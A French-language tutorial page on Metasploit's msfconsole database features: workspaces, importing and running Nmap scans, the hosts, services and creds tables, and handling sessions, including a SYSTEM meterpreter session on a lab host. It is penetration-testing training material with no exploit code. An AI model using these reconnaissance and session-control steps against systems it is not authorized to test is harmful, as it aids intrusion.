    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Après avoir confirmé que la base de données est correctement connectée, nous pouvons organiser notre Workspaces

Workspaces:

Nous pouvons penser de Workspacesla même manière que nous penserions aux dossiers d'un projet. Nous pouvons séparer les différents résultats d'analyse, les hôtes et les informations extraites par IP, sous-réseau, réseau ou domaine.

workspace -a Target_1

[*] Added workspace: Target_1
[*] Workspace: Target_1


msf6 > workspace Target_1 

[*] Workspace: Target_1


msf6 > workspace

  default
* Target_1

Importing Scan Results

Ensuite, supposons que nous souhaitons importer un fichier Nmap scand'un hôte dans l'espace de travail de notre base de données pour mieux comprendre la cible

msf6 > db_import Target.xml

[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.9'
[*] Importing host 10.10.10.40
[*] Successfully imported ~/Target.xml


msf6 > hosts

Hosts
=====

address      mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------  ---------  -----  -------  ----  --------
10.10.10.40             Unknown                    device         


msf6 > services

Services
========

host         port   proto  name          state  info
----         ----   -----  ----          -----  ----
10.10.10.40  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.40  445    tcp    microsoft-ds  open   Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.10.40  49152  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49153  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49154  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49155  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49156  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49157  tcp    msrpc         open   Microsoft Windows RPC

Using Nmap Inside MSFconsole

Alternativement, nous pouvons utiliser Nmap directement depuis msfconsole ! Pour scanner directement depuis la console sans avoir à passer en arrière-plan ou à quitter le processus, utilisez la db_nmapcommande.

db_nmap -sV -sS 10.10.10.8

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 21:04 UTC
[*] Nmap: Nmap scan report for 10.10.10.8
[*] Nmap: Host is up (0.016s latency).
[*] Nmap: Not shown: 999 filtered ports
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 80/TCP open  http    HttpFileServer httpd 2.3
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Data Backup

Une fois la session terminée, assurez-vous de sauvegarder vos données si quelque chose se produit avec le service PostgreSQL. Pour ce faire, utilisez la db_exportcommande.

db_export -h

Usage:
    db_export -f <format> [filename]
    Format can be one of: xml, pwdump

Hôtes:

Les hôtes peuvent également être ajoutés manuellement sous forme d'entrées distinctes dans ce tableau. Après avoir ajouté nos hôtes personnalisés, nous pouvons également organiser le format et la structure du tableau, ajouter des commentaires, modifier les informations existantes, etc.

hosts -h

Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
  -a,--add          Add the hosts instead of searching
  -d,--delete       Delete the hosts instead of searching
  -c <col1,col2>    Only show the given columns (see list below)
  -C <col1,col2>    Only show the given columns until the next restart (see list below)
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in CSV format
  -O <column>       Order rows by specified column number
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -i,--info         Change the info of a host
  -n,--name         Change the name of a host
  -m,--comment      Change the comment of a host
  -t,--tag          Add or specify a tag to a range of hosts

Services La `services`commande fonctionne de la même manière que la précédente. Elle contient un tableau avec des descriptions et des informations sur les services découverts lors des analyses ou des interactions. De la même manière que la commande ci-dessus, les entrées ici sont hautement personnalisables.

services -h

Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <filename>] [addr1 addr2 ...]

  -a,--add          Add the services instead of searching
  -d,--delete       Delete the services instead of searching
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -s <name>         Name of the service to add
  -p <port>         Search for a list of ports
  -r <protocol>     Protocol type of the service being added [tcp|udp]
  -u,--up           Only show services which are up
  -o <file>         Send output to a file in csv format
  -O <column>       Order rows by specified column number
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -U,--update       Update data for existing service

Informations d'identification

La credscommande permet de visualiser les informations d'identification collectées lors de vos interactions avec l'hôte cible. Nous pouvons également ajouter des informations d'identification manuellement, faire correspondre les informations d'identification existantes avec les spécifications du port, ajouter des descriptions, etc.

Sessions:

Sessions

MSFconsole peut gérer plusieurs modules en même temps. C'est l'une des nombreuses raisons pour lesquelles elle offre à l'utilisateur une telle flexibilité. Cela se fait grâce à l'utilisation de Sessions, qui crée des interfaces de contrôle dédiées pour tous vos modules déployés.
Une fois plusieurs sessions créées, nous pouvons basculer entre elles et lier un module différent à l'une des sessions en arrière-plan pour l'exécuter ou les transformer en tâches. Notez qu'une fois qu'une session est placée en arrière-plan, elle continuera à s'exécuter et notre connexion à l'hôte cible persistera. Les sessions peuvent cependant mourir si quelque chose se passe mal pendant l'exécution de la charge utile, ce qui entraîne la rupture du canal de communication.

Listing Active Sessions

Nous pouvons utiliser la sessionscommande pour afficher nos sessions actuellement actives.

msf6 exploit(windows/smb/psexec_psh) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MS01  10.10.10.129:443 -> 10.10.10.205:50501 (10.10.10.205)

Interacting with a Session

Vous pouvez utiliser la sessions -i [no.]commande pour ouvrir une session spécifique.

msf6 exploit(windows/smb/psexec_psh) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?

Metasploit:

Modules:

Plugins:

Scénarios:

Outils:

MSFconsole

Structure d'engagement de MSF

Components

Recherche de modules:

Une fois que nous sommes dans le msfconsole, nous pouvons sélectionner parmi une longue liste contenant tous les modules Metasploit disponibles. Chacun d'entre eux est structuré en dossiers, qui ressembleront à ceci :

Recherche spécifique:

Utilisation des modules:

Targets

Show Targets:

Payloads:

Staged Payloads:

Payloads Meterpreter:

Searching for Payloads:

Searching for Specific Payload:

Select Payload:

Using Payloads:

Payload Types:

Encoders

Selecting an Encoder:

Generating Payload - Without Encoding:

Generating Payload - With Encoding:

Shikata Ga Nai Encoding:

VirusTotal:

Databases:

Setting up the Database

Using the Database

Workspaces:

Importing Scan Results

Using Nmap Inside MSFconsole

Data Backup

Hôtes:

Informations d'identification

Sessions:

Sessions

Une fois que nous sommes dans le `msfconsole`, nous pouvons sélectionner parmi une longue liste contenant tous les modules Metasploit disponibles. Chacun d'entre eux est structuré en dossiers, qui ressembleront à ceci :